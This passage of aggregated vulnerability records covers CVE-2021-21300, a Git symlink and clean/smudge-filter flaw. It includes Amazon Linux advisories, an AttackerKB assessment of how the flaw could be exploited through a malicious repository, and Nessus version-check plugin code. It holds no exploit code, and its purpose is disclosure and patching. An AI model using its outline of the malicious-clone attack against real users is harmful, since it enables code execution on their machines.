\u00a0\u00a0\u00a0 git-instaweb-2.18.5-2.73.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-21300](<https://access.redhat.com/security/cve/CVE-2021-21300>)\n\nMitre: [CVE-2021-21300](<https://vulners.com/cve/CVE-2021-21300>)\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-23T22:59:00", "type": "amazon", "title": "Medium: git", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-25T19:49:00", "id": "ALAS-2021-1490", "href": "https://alas.aws.amazon.com/ALAS-2021-1490.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T17:33:01", "description": "**Issue Overview:**\n\nGit is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\n \n**Affected Packages:** \n\n\ngit\n\n \n**Issue Correction:** \nRun _yum update git_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 git-2.23.4-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 git-core-2.23.4-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 git-daemon-2.23.4-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 git-subtree-2.23.4-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 git-debuginfo-2.23.4-1.amzn2.0.1.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 git-2.23.4-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 git-core-2.23.4-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 git-daemon-2.23.4-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 git-subtree-2.23.4-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 git-debuginfo-2.23.4-1.amzn2.0.1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 git-all-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 git-core-doc-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 git-cvs-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 git-email-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 gitk-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 gitweb-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 git-gui-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 git-instaweb-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 git-p4-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 perl-Git-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 perl-Git-SVN-2.23.4-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 git-svn-2.23.4-1.amzn2.0.1.noarch \n \n src: \n \u00a0\u00a0\u00a0 git-2.23.4-1.amzn2.0.1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 git-2.23.4-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 git-core-2.23.4-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 git-daemon-2.23.4-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 git-subtree-2.23.4-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 git-debuginfo-2.23.4-1.amzn2.0.1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-21300](<https://access.redhat.com/security/cve/CVE-2021-21300>)\n\nMitre: [CVE-2021-21300](<https://vulners.com/cve/CVE-2021-21300>)\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-25T18:31:00", "type": "amazon", "title": "Medium: git", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-25T20:53:00", "id": "ALAS2-2021-1621", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1621.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-10-22T07:42:46", "description": "Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won\u2019t work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.\n\n \n**Recent assessments:** \n \n**space-r7** at March 26, 2021 5:46pm UTC reported:\n\nWhile this vulnerability has the potential to be dangerous, I think the limitations for exploitation outweigh its value. To successfully exploit this vulnerability, an attacker must be able to host a malicious repo and convince a user to clone said repo. Additionally, each platform has its own requirements.\n\nThere are a few hosting options, and they all have their caveats that would limit the exploit in some way. An attacker could use a \u201ctrusted\u201d hosting service such as Github, Gitlab, etc. Hosting on a trusted service could be either through compromising an existing, perhaps commonly-used repo or by hosting a single, malicious repo of their own. The former option adds complexity because it would require the attacker to be able to add multiple files to the repo unnoticed. The latter option would be an easier and more credible / trustworthy option versus using a self-hosting method. Despite that, the repo would likely be identified and removed, limiting the exploit even further. As mentioned before, the self-hosting option exists, but would be the most limited since users would be more cautious with repositories from an untrusted source.\n\nAside from the hosting limitations, a user must have some form of clean / smudge filters set up globally with Git so that the repo\u2019s contents can be checked out out-of-order on a clone. According to the advisory, Git for Windows has clean / smudge filters set up by default through `Git-lfs`, so Windows users are most vulnerable. For MacOS, clean / smudge filters must be set up manually. Thanks to Foone\u2019s fantastic [analysis](<https://twitter.com/Foone/status/1369500506469527552?s=20>), it turns out that Linux can also be vulnerable, provided that clean / smudge filters are set up globally, and the malicious repo is cloned on a case-insensitive file system, i.e., a mounted drive.\n\nBecause so many limitations exist for successful exploitation, I wouldn\u2019t rate this as a critical vulnerability. It is dangerous, but because it relies on user interaction and a specific local configuration of the vulnerable software, I\u2019m giving it a middle score for both `Attacker Value` and `Exploitability`. I\u2019ve selected both `vulnerable in default configuration` and `vulnerable in uncommon configuration` since it\u2019s dependent on the platform that the Git client is installed on. Windows is vulnerable by default, and the other platforms require additional setup to be truly vulnerable.\n\nAs always, upgrade to the patched version, **especially Windows users** in this case. If that\u2019s not possible, users can still disable global clean / smudge filters and disable symlinks in Git.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-21300", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-19T00:00:00", "id": "AKB:3A3E50F2-FC37-42B7-AC9E-A373A168289D", "href": "https://attackerkb.com/comments/7ef8b0c9-cc88-45fe-8bdc-d41eedb78372", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:45:42", "description": "The version of git installed on the remote host is prior to 2.18.5-2.73. It is, therefore, affected by a vulnerability as referenced in the ALAS-2021-1490 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-25T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : git (ALAS-2021-1490)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:emacs-git", "p-cpe:/a:amazon:linux:emacs-git-el", "p-cpe:/a:amazon:linux:git", "p-cpe:/a:amazon:linux:git-all", "p-cpe:/a:amazon:linux:git-bzr", "p-cpe:/a:amazon:linux:git-core", "p-cpe:/a:amazon:linux:git-core-doc", "p-cpe:/a:amazon:linux:git-cvs", "p-cpe:/a:amazon:linux:git-daemon", "p-cpe:/a:amazon:linux:git-debuginfo", "p-cpe:/a:amazon:linux:git-email", "p-cpe:/a:amazon:linux:git-hg", "p-cpe:/a:amazon:linux:git-instaweb", "p-cpe:/a:amazon:linux:git-p4", "p-cpe:/a:amazon:linux:git-subtree", "p-cpe:/a:amazon:linux:git-svn", "p-cpe:/a:amazon:linux:gitweb", "p-cpe:/a:amazon:linux:perl-Git", "p-cpe:/a:amazon:linux:perl-Git-SVN", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2021-1490.NASL", "href": "https://www.tenable.com/plugins/nessus/148131", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2021-1490.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148131);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"ALAS\", value:\"2021-1490\");\n\n script_name(english:\"Amazon Linux AMI : git (ALAS-2021-1490)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of git installed on the remote host is prior to 2.18.5-2.73. It is, therefore, affected by a vulnerability\nas referenced in the ALAS-2021-1490 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2021-1490.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21300\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update git' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-core-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-instaweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-subtree\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'emacs-git-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'emacs-git-el-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-2.18.5-2.73.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-2.18.5-2.73.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-all-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-bzr-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-core-2.18.5-2.73.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-core-2.18.5-2.73.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-core-doc-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-cvs-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-daemon-2.18.5-2.73.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-daemon-2.18.5-2.73.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-debuginfo-2.18.5-2.73.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-debuginfo-2.18.5-2.73.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-email-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-hg-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-instaweb-2.18.5-2.73.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-instaweb-2.18.5-2.73.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-p4-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-subtree-2.18.5-2.73.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-subtree-2.18.5-2.73.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-svn-2.18.5-2.73.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-svn-2.18.5-2.73.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gitweb-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perl-Git-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perl-Git-SVN-2.18.5-2.73.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / etc\");\n}", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T14:24:43", "description": "New git packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-12T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / 14.2 / current : git (SSA:2021-070-01)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-26T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:git", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2021-070-01.NASL", "href": "https://www.tenable.com/plugins/nessus/147737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2021-070-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147737);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"SSA\", value:\"2021-070-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : git (SSA:2021-070-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New git packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.436701\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5a9932c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", 